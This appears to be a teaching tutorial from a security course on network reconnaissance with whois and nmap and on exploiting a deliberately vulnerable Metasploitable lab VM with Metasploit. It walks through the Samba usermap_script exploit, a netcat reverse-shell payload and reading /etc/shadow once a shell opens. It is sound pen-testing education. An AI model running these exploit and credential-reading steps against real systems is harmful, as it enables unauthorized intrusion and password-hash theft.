Network Exploitation - nmap and Metasploit

Network Recon

Finding a target device to attack depends on the hacker’s objectives and may be opportunistic or targeted.

Either way, the first step in remote exploitation is to discover the target and gather After all, one cannot exploit a host that does not exist! The next step consists of gathering public information about the target, including what ports are open and which applications are available over the network.

IP Addresses

Recall an IPv4 address is specified by 4 bytes (32 bits), constituting an integer value between 0 and 2^32-1. Typically an IP address is written as four base-10 octets UUU.VVV.WWW.XXX where UUU, VVV, WWW, and XXX are in the range 0..255.

For example, the IP address of is The University of Western Ontario, however, administers many hosts… an entire network in fact.

We can use the CIDR notation to specify a network range. An IP range in this notation has the form UUU.VVV.WWW.XXX/YY where YY is an integer in the range 0..32 specifying how many of the top YY bits of the IP address are fixed.

Here are some examples:

  • would specify that the top 8 out of 32 bits of the address are fixed, i.e., specifies all addresses that vary in the lower (32-8)=24 bits:
129.  0.  0.  0 = 10000001.00000000.00000000.00000000 = 10000001.11111111.11111111.11111111
  • would specify an address range were the top 32 out of 32 bits are fixed. In other words, it specifies the single IP address, i.e., just itself:
129.100.  0. 79 = 10000001.01100100.00000000.01001111
  • specifies the top 29 bits are fixed, i.e., the lower 32-29=3 bits vary. This specifies the 2^3=8hosts “closest” to (including itself):
129.100.  0. 72 = 10000001.01100100.00000000.01001000
129.100.  0. 79 = 10000001.01100100.00000000.01001111
  • specifies 0 out of 32 bits of the addressed are fixed, meaning this range spans the entire IPv4 space! = 00000000.00000000.00000000.00000000 = 11111111.11111111.11111111.11111111


IPv6 uses a 128-bit (16 byte) address usually represented as eight groups of 4 hexadecimal characters, for example:


which can also be expressed in a compressed form to suppress leading zeros:



Suppose a penetration tester is hired to perform an evaluation of a The University of Western Ontario. The permission to conduct this evaluation (if it were for real) would obviously exist between the tester and Western, so the tester would first want to confirm which IP addresses belong to Western.

They can start by gathering basic public information about the domain from the ARIN:

$ whois
Domain name: 
Domain status:         registered
Creation date:         2000/10/13
Expiry date:           2020/01/12
Updated date:          2010/10/15
DNSSEC:                Unsigned

    Name:     Inc.
    Number:            70

    Name:              The University of Western Ontario

Administrative contact:
    Name:              Jeff Grieve
    Postal address:    Support Services Building Rm 4359
                       London ON N6A3K7 Canada
    Phone:             +1.5196612151
    Fax:               +1.5196613486

Technical contact:
    Name:              Ed Gibson
    Postal address:    Support Services Building rm 4300
                       London ON N6A3K7 Canada
    Phone:             +1.5196612151
    Fax:               +1.5196613486

Name servers:

Next the tester should confirm the IP range owned by Western. This is crucial for the tester not only to narrow their search space, but also to ensure they do not try to hack into a host without permission. Even if the company states its IP range in the contract, the tester would want to confirm it.

The tester might first seek to determine the IP address of the company’s main website:

$ nslookup

Non-authoritative answer:

We see has IP address Next we can consult the Whois database to get information about the owner of this address:

$ whois

# ARIN WHOIS data and services are subject to the Terms of Use

NetRange: -
NetName:        UWO-NET
NetHandle:      NET-129-100-0-0-1
Parent:         NET129 (NET-129-0-0-0-0)
NetType:        Direct Assignment
Organization:   University of Western Ontario (UWO)
RegDate:        1987-10-27
Updated:        2014-02-28

OrgName:        University of Western Ontario
OrgId:          UWO
Address:        Information Technology Services
Address:        1393 Western Road
Address:        Rm SSB 4352
City:           London
StateProv:      ON
PostalCode:     N6G-1G9
Country:        CA
RegDate:        1987-10-27
Updated:        2012-08-31

Here we see Western owns a class B network consisting of IPs in the range to We also see that Western registered in 1987, several years before the web was even invented! Of course they were actively using email and FTP and other early internet services.


A port is a software abstraction Just as IP addresses are used to identify machines on a network, ports identify specific applications running on a machine.

Ports can range in value from 1 to 65535

Reserved Ports

Ports in the range 1 to 1023 are reserved ports, and Unix systems require applications have root privileges to bind to these ports. This gives visitors to a site some assurance they are connecting to a valid system service initiated by the system administrator, and not some unprivileged user. For example, the typical port for ssh is 22.


nmap is a well known network scanning tool for discovering hosts and services. It has a wide range of scanning methods and plugins.

Passive Host Discovery

Passive scans are a good place to start gathering basic information about a host. They have the of benefit of being stealthy as they do not contact the host.

Using nmap you can use the -sL “list scan” option to do reverse-DNS lookups on neighboring IP addresses. For example:

$ nmap -sL 

will tell you the host names of all the hosts on the class A network shared by This will potentially allow us to discover interesting host names, such as this one:

Nmap scan report for (

Active Host Discovery

Active scans are less stealthy than passive scans since they actually directly contact the host. This however allows you to gain more information that you could with a passive scan alone, such as if the host is even currently online.

The -sn option in nmap performs basic host detection (i.e., skips the more detailed port scan).

$ nmap -sn <IP or hostname>/<mask>

The IANA maintains a number of special use domains for the purposes of basic illustrative examples in documents. One such domain is, which you can use to provide another concrete example of nmap’s basic use:

$ nmap -sn

Starting Nmap 5.51 ( ) at 2016-02-21 15:45 EST
Nmap scan report for (
Host is up (0.023s latency).
Nmap done: 1 IP address (1 host up) scanned in 6.70 seconds

Port Scanning

Port scanning can used to gain information about what kinds of software and services might be available on a host. Without specifying any options, nmap will do an initial host discovery followed by a basic port scan,

$ nmap

Starting Nmap 5.51 ( ) at 2016-02-21 15:45 EST
Nmap scan report for (
Host is up (0.022s latency).
Not shown: 993 filtered ports
53/tcp   closed domain
80/tcp   open   http
443/tcp  open   https
554/tcp  closed rtsp
1119/tcp closed bnetgame
1755/tcp closed wms
1935/tcp closed rtmp

Similarly you can use this command to discover hosts and services on your home network, substitute your internal network IP range. First you need to find your own device’s IP address, which you can do in a terminal:

$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet  netmask  broadcast
        inet6 8f80::a28:23af:fe71:b4af  prefixlen 64  scopeid 0x20<link>
        ether 4b:42:7f:45:ac:ad  txqueuelen 1000  (Ethernet)
        RX packets 71  bytes 15823 (15.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 16  bytes 2304 (2.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Here our IP address is so we can proceed to scan the home network, i.e. to using any number of equivalent commands including:

nmap 192.168.1.*

The -sV option performs version detection of the services. This doesn’t always work, especially if the sys admins have taken steps to obfuscate it. In other cases we can learn which server version and OS the target is running. For example, we see is running Windows:

$ nmap -sV

Starting Nmap 5.51 ( ) at 2016-02-21 15:49 EST
Nmap scan report for (
Host is up (0.0026s latency).
rDNS record for
Not shown: 992 filtered ports
22/tcp    open  tcpwrapped
80/tcp    open  http       Microsoft IIS httpd 7.0
5357/tcp  open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7937/tcp  open  rpcbind
7938/tcp  open  rpcbind
8089/tcp  open  rpcbind
49153/tcp open  msrpc      Microsoft Windows RPC
49154/tcp open  msrpc      Microsoft Windows RPC
Service Info: OS: Windows

The -A option prints a more detailed information about services, and used with the -sS option it can be reasonably fast. Metasploitable for example is made purposefully vulnerable to facilitate pen-testing education). For example, this would reveal that it is running Ubuntu on Apache 2.2.8:

80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux

Metasploit and Metasploitable

Metasploit is a customizable exploitation framework for penetration testing. It provides a (somewhat) easy to use interface for managing and deploying exploits. Metasploitable is an intentionally vulnerable version of Linux which allows us to explore exploitation techniques in a sandboxed environment.

Virtual Pen-Testing Lab

We begin downloading Metasploitable 2 (about 800MB) and Kali Linux Virtual Box image. Next we configure them to use an internal (virtual) network.

Step 1: Host Discovery

The first step will be for us to discover available hosts:

$ nmap -sn

Starting Nmap 7.01 ( ) at 2016-02-22 10:32 EST
Nmap scan report for
Host is up (0.00026s latency).
MAC Address: 08:00:27:CB:C4:14 (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up (0.00020s latency).
MAC Address: 08:00:27:C7:57:72 (Oracle VirtualBox virtual NIC)

Here we see a host available at

Step 2: Port Scanning

Next we can scan to explore its port configuration. In particular we’d like to get a little more detailed information about what application versions are running so we’ll use the -sV option.

$ nmap -sV

Starting Nmap 7.01 ( ) at 2016-02-22 10:33 EST
Nmap scan report for
Host is up (0.00015s latency).
Not shown: 977 closed ports

... <additional results> ...

139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

MAC Address: 08:00:27:C7:57:72 (Oracle VirtualBox virtual NIC)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Metasploitable is configured to have many ports open (to allow many possible avenues for exploitation). In particular we notice port 139 is running Samba 3.X. Interesting. You look up Samba on Wikipedia and read that:

Some versions of Samba 3.6.3 and lower suffer serious security issues which can allow anonymous users to gain root access to a system from an anonymous connection.

Step 3: Exploit

  1. Initialize the Metasploit database and start the msfconsole:
$ service postgresql start
$ msfdb init
$ msfconsole

Next check to make sure that the database has connected. Typing:

msf > db_status

Should return:

[*] postgresql connected to msf3

The first time you run Metasploit, you should build the database cache to allow for faster searching:

msf > db_rebuild_cache

This may take 5-10 minutes, so grab a coffee, and restart msfconsole when you come back.

Next we want to search for Samba related exploits:

msf > search samba

Matching Modules

   Name                                            Disclosure Date  Rank       Description
   ----                                            ---------------  ----       -----------


   exploit/multi/samba/usermap_script              2007-05-14       excellent  Samba "username map script" Command Execution

Here see see an Excellent-ranked Samba exploit which we can use. Next we load the exploit:

msf > use exploit/multi/samba/usermap_script 
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

We see that this exploit requires us to specify RHOST, i.e., the remote host’s IP address, and RPORT the target port.

msf exploit(usermap_script) > set LHOST
msf exploit(usermap_script) > set LPORT 666
LPORT => 666
msf exploit(usermap_script) > set RHOST
msf exploit(usermap_script) > set RPORT 139
RPORT => 139
msf exploit(usermap_script) > set TARGET 0

Step 4: Payload

Now that the exploit is configured and ready, the final step is to specify the payload, i.e., the malicious code we wish to deliver via the exploit. We need to see which payloads are compatible by typing:

msf > show payloads

to receive a list. We’re going to use a netcat based reverse TCP shell:

msf > set payload cmd/unix/reverse_netcat

Now we’re ready to go:

msf exploit(usermap_script) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 
msf exploit(usermap_script) > [*] Command shell session 1 opened ( -> at 2016-02-22 12:08:50 -0500

Now if we type sessions we get

Active sessions

  Id  Type        Information  Connection
  --  ----        -----------  ----------
  1   shell unix      -> (

So now we want to bind to the active session:

msf exploit(usermap_script) > sessions -i 1
[*] Starting interaction with 1...

After a few moments you will be able to type commands!

cat /etc/shadow

Additional Resources